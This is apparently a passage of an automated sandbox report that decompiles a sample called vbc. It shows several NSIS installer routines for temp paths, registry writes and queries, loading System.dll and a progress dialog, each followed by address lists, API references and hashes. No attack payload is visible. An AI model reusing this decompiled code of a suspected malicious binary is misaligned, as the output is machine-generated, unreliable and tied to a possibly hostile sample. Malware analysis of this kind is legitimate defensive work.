                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb1814.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32 ref: 00402515
                                                • RegCloseKey.ADVAPI32(?), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb1814.tmp
                                                • API String ID: 2655323295-1366201071
                                                • Opcode ID: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                • Opcode Fuzzy Hash: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405E0C(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405e0d
                                                0x00405e1a
                                                0x00405e1b
                                                0x00405e26
                                                0x00405e2e
                                                0x00405e2e
                                                0x00405e36

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                • CharPrevW.USER32(?,00000000), ref: 00405E1C
                                                • lstrcatW.KERNEL32 ref: 00405E2E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E731910E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                				void* _v0;
                                                				void* _t27;
                                                				signed int _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t63;
                                                				void* _t64;
                                                				signed int _t66;
                                                				void* _t67;
                                                				void* _t73;
                                                				void* _t74;
                                                				void* _t77;
                                                				void* _t80;
                                                				void _t81;
                                                				void _t82;
                                                				intOrPtr _t84;
                                                				void* _t86;
                                                				void* _t88;
                                                
                                                				 *0x7319506c = _a8;
                                                				 *0x73195070 = _a16;
                                                				 *0x73195074 = _a12;
                                                				_a12( *0x73195048, E73191651, _t73);
                                                				_t66 =  *0x7319506c +  *0x7319506c * 4 << 3;
                                                				_t27 = E731912E3();
                                                				_v0 = _t27;
                                                				_t74 = _t27;
                                                				if( *_t27 == 0) {
                                                					L28:
                                                					return GlobalFree(_t27);
                                                				}
                                                				do {
                                                					_t29 =  *_t74 & 0x0000ffff;
                                                					_t67 = 2;
                                                					_t74 = _t74 + _t67;
                                                					_t88 = _t29 - 0x66;
                                                					if(_t88 > 0) {
                                                						_t30 = _t29 - 0x6c;
                                                						if(_t30 == 0) {
                                                							L23:
                                                							_t31 =  *0x73195040;
                                                							if( *0x73195040 == 0) {
                                                								goto L26;
                                                							}
                                                							E73191603( *0x73195074, _t31 + 4, _t66);
                                                							_t34 =  *0x73195040;
                                                							_t86 = _t86 + 0xc;
                                                							 *0x73195040 =  *_t34;
                                                							L25:
                                                							GlobalFree(_t34);
                                                							goto L26;
                                                						}
                                                						_t36 = _t30 - 4;
                                                						if(_t36 == 0) {
                                                							L13:
                                                							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73191312(E7319135A(_t38));
                                                							L14:
                                                							goto L25;
                                                						}
                                                						_t40 = _t36 - _t67;
                                                						if(_t40 == 0) {
                                                							L11:
                                                							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73191381(_t80, E731912E3());
                                                							goto L14;
                                                						}
                                                						L8:
                                                						if(_t40 == 1) {
                                                							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                							_t10 = _t81 + 4; // 0x4
                                                							E73191603(_t10,  *0x73195074, _t66);
                                                							_t86 = _t86 + 0xc;
                                                							 *_t81 =  *0x73195040;
                                                							 *0x73195040 = _t81;
                                                						}
                                                						goto L26;
                                                					}
                                                					if(_t88 == 0) {
                                                						_t48 =  *0x73195070;
                                                						_t77 =  *_t48;
                                                						 *_t48 =  *_t77;
                                                						_t49 = _v0;
                                                						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                							E73191603(_t49, _t77 + 8, 0x38);
                                                							_t86 = _t86 + 0xc;
                                                						}
                                                						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                						GlobalFree(_t77);
                                                						goto L26;
                                                					}
                                                					_t54 = _t29 - 0x46;
                                                					if(_t54 == 0) {
                                                						_t82 = GlobalAlloc(0x40,  *0x7319506c +  *0x7319506c + 8);
                                                						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                						_t14 = _t82 + 8; // 0x8
                                                						E73191603(_t14, _v0, 0x38);
                                                						_t86 = _t86 + 0xc;
                                                						 *_t82 =  *( *0x73195070);
                                                						 *( *0x73195070) = _t82;
                                                						goto L26;
                                                					}
                                                					_t63 = _t54 - 6;
                                                					if(_t63 == 0) {
                                                						goto L23;
                                                					}
                                                					_t64 = _t63 - 4;
                                                					if(_t64 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L13;
                                                					}
                                                					_t40 = _t64 - _t67;
                                                					if(_t40 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L11;
                                                					}
                                                					goto L8;
                                                					L26:
                                                				} while ( *_t74 != 0);
                                                				_t27 = _v0;
                                                				goto L28;
                                                			}


























                                                0x731910eb
                                                0x73191100
                                                0x73191109
                                                0x7319110e
                                                0x73191119
                                                0x7319111c
                                                0x73191125
                                                0x73191129
                                                0x7319112b
                                                0x731912b0
                                                0x731912ba
                                                0x731912ba
                                                0x73191132
                                                0x73191132
                                                0x73191137
                                                0x73191138
                                                0x7319113a
                                                0x7319113d
                                                0x73191256
                                                0x73191259
                                                0x73191271
                                                0x73191271
                                                0x73191278
                                                0x00000000
                                                0x00000000
                                                0x73191285
                                                0x7319128a
                                                0x7319128f
                                                0x73191294
                                                0x7319129a
                                                0x7319129b
                                                0x00000000
                                                0x7319129b
                                                0x7319125b
                                                0x7319125e
                                                0x731911bc
                                                0x731911bf
                                                0x731911c2
                                                0x731911cb
                                                0x731911d0
                                                0x00000000
                                                0x731911d1
                                                0x73191264
                                                0x73191266
                                                0x731911a2
                                                0x731911a5
                                                0x731911a8
                                                0x731911b1
                                                0x00000000
                                                0x731911b1
                                                0x73191164
                                                0x73191165
                                                0x73191177
                                                0x73191180
                                                0x73191184
                                                0x7319118e
                                                0x73191191
                                                0x73191193
                                                0x73191193
                                                0x00000000
                                                0x73191165
                                                0x73191143
                                                0x73191218
                                                0x7319121d
                                                0x73191221
                                                0x73191223
                                                0x7319122c
                                                0x7319122f
                                                0x73191238
                                                0x7319123d
                                                0x7319123d
                                                0x73191247
                                                0x7319124a
                                                0x00000000
                                                0x73191250
                                                0x73191149
                                                0x7319114c
                                                0x731911e9
                                                0x731911ed
                                                0x731911f7
                                                0x731911fb
                                                0x73191205
                                                0x7319120a
                                                0x73191211
                                                0x00000000
                                                0x73191211
                                                0x73191152
                                                0x73191155
                                                0x00000000
                                                0x00000000
                                                0x7319115b
                                                0x7319115e
                                                0x731911b8
                                                0x00000000
                                                0x731911b8
                                                0x73191160
                                                0x73191162
                                                0x7319119e
                                                0x00000000
                                                0x7319119e
                                                0x00000000
                                                0x731912a1
                                                0x731912a1
                                                0x731912ab
                                                0x00000000

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 73191171
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 731911E3
                                                • GlobalFree.KERNEL32 ref: 7319124A
                                                • GlobalFree.KERNEL32(?), ref: 7319129B
                                                • GlobalFree.KERNEL32(00000000), ref: 731912B1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: ea0c988c01bad18b282ad86fd08232f1ebf359f3a690da712e76c6b845d2ca90
                                                • Instruction ID: d6a5c1bd2303cde741843c2ee09bbabb05dfcb1c20cabf9871520dc24ce73676
                                                • Opcode Fuzzy Hash: ea0c988c01bad18b282ad86fd08232f1ebf359f3a690da712e76c6b845d2ca90
                                                • Instruction Fuzzy Hash: 965180B6900281DFF704EF65C854B6577B8FB08715B2B4139F90AFB650E730A990CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				void* _t24;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				signed int _t32;
                                                				void* _t35;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __edi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x28);
                                                				_t40 = __edx - 0x38;
                                                				 *(_t35 - 0x10) = _t14;
                                                				_t27 = 0 | _t40 == 0x00000000;
                                                				_t32 = _t40 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                					} else {
                                                						E00402DA6(0x21);
                                                						E0040655F("C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp", "C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp\System.dll", 0x400);
                                                						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402D84(1);
                                                					 *0x40adf0 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t29 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t31 = E0040649D(_t27, _t29);
                                                					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                						_t14 = E004060DF(_t31, "C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp\System.dll",  *(_t35 + 8));
                                                						_t42 = _t14;
                                                						if(_t42 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb1814.tmp$C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll
                                                • API String ID: 1659193697-1545326362
                                                • Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                • Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					if( *0x42aa20 == 0) {
                                                						_t2 = GetTickCount();
                                                						if(_t2 >  *0x434f0c) {
                                                							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                							 *0x42aa20 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406946(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x42aa20;
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x42aa20 = 0;
                                                					return _t6;
                                                				}
                                                			}






                                                0x00403020
                                                0x00403040
                                                0x0040304a
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32 ref: 0040302C
                                                • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405F14(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E0040653D(0x42fa70, _a4);
                                                				_t21 = E00405EB7(0x42fa70);
                                                				if(_t21 != 0) {
                                                					E004067C4(_t21);
                                                					if(( *0x434f18 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x42fa70 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x42fa70);
                                                							_push(0x42fa70);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406873();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405E58(0x42fa70);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405E0C();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                0x00405f20
                                                0x00405f2b
                                                0x00405f2f
                                                0x00405f36
                                                0x00405f42
                                                0x00405f52
                                                0x00405f54
                                                0x00405f6c
                                                0x00405f6d
                                                0x00405f74
                                                0x00405f75
                                                0x00000000
                                                0x00000000
                                                0x00405f58
                                                0x00405f5f
                                                0x00405f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f5f
                                                0x00405f77
                                                0x00000000
                                                0x00405f8b
                                                0x00405f44
                                                0x00405f4a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f4a
                                                0x00405f31
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-4017390910
                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x42d254 = _t16;
                                                							E00404ED4();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404E54(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004044E5(0x413);
                                                				return 0;
                                                			}





                                                0x00405517
                                                0x00405521
                                                0x0040553d
                                                0x0040555f
                                                0x00405562
                                                0x00405568
                                                0x00405572
                                                0x00405573
                                                0x00405575
                                                0x0040557b
                                                0x0040557b
                                                0x00405585
                                                0x00000000
                                                0x00405593
                                                0x0040554a
                                                0x00405582
                                                0x00405582
                                                0x00000000
                                                0x00405582
                                                0x00405556
                                                0x00405558
                                                0x00000000
                                                0x00405558
                                                0x00405527
                                                0x00000000
                                                0x00000000
                                                0x0040552e
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                				int _v8;
                                                				long _t21;
                                                				long _t24;
                                                				char* _t30;
                                                
                                                				asm("sbb eax, eax");
                                                				_v8 = 0x800;
                                                				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                				_t30 = _a16;
                                                				if(_t21 != 0) {
                                                					L4:
                                                					 *_t30 =  *_t30 & 0x00000000;
                                                				} else {
                                                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                					_t21 = RegCloseKey(_a20);
                                                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                						goto L4;
                                                					}
                                                				}
                                                				return _t21;
                                                			}







                                                0x00406419
                                                0x0040641b
                                                0x00406433
                                                0x00406438
                                                0x0040643d
                                                0x0040647b
                                                0x0040647b
                                                0x0040643f
                                                0x00406451
                                                0x0040645c
                                                0x00406462
                                                0x0040646d
                                                0x00000000
                                                0x00000000
                                                0x0040646d
                                                0x00406481

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406451
                                                • RegCloseKey.ADVAPI32(?), ref: 0040645C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
